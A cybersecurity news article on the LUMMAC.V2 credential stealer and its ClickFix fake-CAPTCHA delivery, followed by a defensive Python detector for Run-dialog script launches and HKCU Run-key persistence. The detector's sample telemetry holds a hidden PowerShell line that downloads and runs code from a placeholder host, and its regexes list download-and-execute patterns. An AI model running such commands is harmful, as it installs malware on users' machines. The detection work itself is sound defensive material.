Cybersecurity experts have identified a sophisticated evolution of the LUMMAC credential stealer, now rewritten from C to C++ and operating with enhanced capabilities. This new variant, designated LUMMAC.V2, has been observed targeting a wide range of applications including browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.

The malware's primary function is to exfiltrate sensitive information such as credentials, logins, emails, personal details, system information, screenshots, and cookies, subsequently compressing this data into a ZIP archive for transmission over HTTP connections.

What makes LUMMAC.V2 particularly dangerous is its distribution method, which relies heavily on social engineering rather than technical exploits. The malware propagates through malicious links embedded in search results, especially those related to cracked software, popular movies, or music releases. When users click these links, they are redirected to deceptive websites that pose as security verification pages with fake CAPTCHA challenges.

Google Cloud Security Community researchers have identified that the ClickFix technique forms the cornerstone of LUMMAC.V2's attack methodology. The ClickFix technique operates by instructing users to perform seemingly innocuous actions that trigger malware execution. When victims land on the fake CAPTCHA page, they are guided to press Windows+R to open the Run dialog box, then instructed to press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally to press Enter to execute it. This technique tricks users into executing commands without realizing they are initiating a malware installation.

This command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The figure shows an example of this deceptive page in action, while the following image reveals the underlying website's source code designed to execute this attack.

The LUMMAC.V2 campaign represents a significant threat not only because of its extensive data theft capabilities but also because it exploits human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.
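The two observable artefacts described above, a Run-dialog launch of a scripting host and a new HKCU Run value, can be hunted for in process-creation and registry telemetry. The following detection logic is an added example written for this article, not code from the researchers or the malware; the pipe-delimited Sysmon-style event lines are constructed sample data, and the field names (EventID, Image, ParentImage, CommandLine, TargetObject, User) are assumptions modelled on Sysmon events 1 and 13.

```python
"""Flag ClickFix-style Run-dialog launches and HKCU Run persistence in sample events."""
import re

# A command typed into Win+R is started by explorer.exe; on its own that is also how any
# double-clicked program starts, so the rule additionally requires a scripting host and
# download-or-hide style arguments to keep false positives down.
RUN_DIALOG_PARENT = "explorer.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_ARGS = re.compile(r"(-enc|-encodedcommand|-w(indowstyle)? hidden|iex\b|invoke-expression|"
                             r"downloadstring|https?://)", re.I)
# Sysmon reports the current-user hive as HKU\<SID>; accept the HKCU spelling from the article too.
RUN_KEY_RE = re.compile(r"^(HKCU|HKU\\[^\\]+)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)

# Constructed sample telemetry (not real events); example.invalid is a reserved, non-resolving name.
SAMPLE_EVENTS = [
    r"EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe"
    r'|CommandLine=powershell -w hidden -c "iex (irm http://example.invalid/x)"|User=LAB\alice',
    r"EventID=1|Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe|User=LAB\alice",
    r"EventID=13|TargetObject=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater|Details=C:\Users\alice\AppData\Roaming\svc.exe|User=LAB\alice",
    r"EventID=13|TargetObject=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden|Details=DWORD (0x00000001)|User=LAB\alice",
]

def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' line into a field dictionary."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def is_run_dialog_script_host(ev: dict) -> bool:
    """Process creation: explorer.exe parent + scripting host + download/hidden-window arguments."""
    if ev.get("EventID") != "1":
        return False
    return (basename(ev.get("ParentImage", "")) == RUN_DIALOG_PARENT
            and basename(ev.get("Image", "")) in SCRIPT_HOSTS
            and bool(SUSPICIOUS_ARGS.search(ev.get("CommandLine", ""))))

def is_hkcu_run_persistence(ev: dict) -> bool:
    """Registry value set: a new entry under the current user's Run key."""
    return ev.get("EventID") == "13" and bool(RUN_KEY_RE.search(ev.get("TargetObject", "")))

def triage(lines):
    """Return (rule, user, evidence) tuples for every event that matches a rule."""
    alerts = []
    for ev in map(parse_event, lines):
        if is_run_dialog_script_host(ev):
            alerts.append(("clickfix_run_dialog", ev["User"], ev["CommandLine"]))
        elif is_hkcu_run_persistence(ev):
            alerts.append(("hkcu_run_persistence", ev["User"], ev["TargetObject"]))
    return alerts
```

Running `triage(SAMPLE_EVENTS)` yields one alert for the hidden PowerShell launched from the Run dialog and one for the Run-key value, while the notepad launch and the unrelated Explorer setting are ignored.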
This Cyber News was published on cybersecuritynews.com. Publication date: Mon, 05 May 2025 10:40:04 +0000